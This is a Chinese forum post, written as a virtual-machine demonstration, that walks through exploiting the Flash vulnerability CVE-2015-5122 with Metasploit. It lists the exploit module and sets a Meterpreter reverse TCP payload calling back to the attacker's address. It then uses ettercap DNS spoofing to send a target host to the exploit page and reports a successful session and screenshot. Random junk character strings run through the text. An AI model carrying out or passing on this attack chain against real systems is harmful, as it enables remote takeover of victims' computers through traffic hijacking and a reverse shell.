cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

D8 t: p' ]8 L" y 二、cve2015-5122漏洞实例演示虚拟机 2 S7 S2 ?/ f E3 I& B

( C y' d2 Z" N0 l3 Q9 H 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ! g7 G' `" r5 E

2 j) U! T2 H! l5 _3 d4 c1 ` search cve-2015-5122如图： 5 j! ?0 o5 b. O' w+ i% N% `

! X" B9 G1 N, {; Q1 }2 H ; G) ]8 W' J3 k; z

: Z( Q% u0 ^6 D% V5 P, F h+ R 下面我们敲如下命令： & n6 k5 X5 Z" S4 v7 W. d

* }$ o2 p$ T! t use exploit/multi/browser/adobe_flash_opaque_background_uaf : Y4 W6 \7 M) J/ a2 I2 m; Y6 @: o& n

6 }' Y/ A6 z/ F) I set PAYLOAD windows/meterpreter/reverse_tcp 7 Q: p) d1 X! B# p; U

; K; M) u8 }% f- n R7 g set LHOST 192.168.0.109 4 R5 K7 @9 I4 g! Q

: K9 |3 B" j/ S, c! q5 s set URIPATH / /*根目录*/ + ]% h# k+ u* o+ _9 Q3 B

* i" Z* q5 V$ d7 H& k4 A set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 " V- n n4 {2 d# [! f5 _

$ R9 p* x$ B7 R6 Y5 x set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + _* i7 k2 I2 w, c, L9 v/ _$ q

' j0 Z+ e+ Y0 f6 s0 Q1 [2 B 然后show options如图： 8 f0 | l/ ^& T I2 B' E

& @2 _. u0 t7 `9 Q6 m3 C/ H# A " ]* L& N: o D

5 _6 a$ J: T& O8 A 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
! X9 o, H1 f; ~& H$ O 9 K) Z! M; z3 f+ w3 s

# {# o7 {+ l- c# Y 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 * J b0 H# ^% Z/ H0 \5 s

7 F( [8 \* i, ~" i) M6 g) O* | Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ( H8 h ~8 p) ~! N e9 l" \) M

- \* Y8 z1 {9 I/ N A ) j# O4 c q' t- r

3 Z- B' d4 Q& a }, q 成功了，这时候我们断开ettercap，如图： # D& ?) H% _) Q0 t1 }! g( R; a

! U F4 b$ o9 x- Z 8 w8 T* j+ z% X" \

/ A) i# Z- ?3 I) G M; v Screenshot如图： 9 ^& e3 w- U- c+ C

& a! C! D2 |2 v" s8 }- z5 a% | : K( T* T* e4 e- O

1 w6 }. F w2 o9 J( l $ f/ C8 j5 K; s2 D3 l

		自动登录	找回密码
密码			立即注册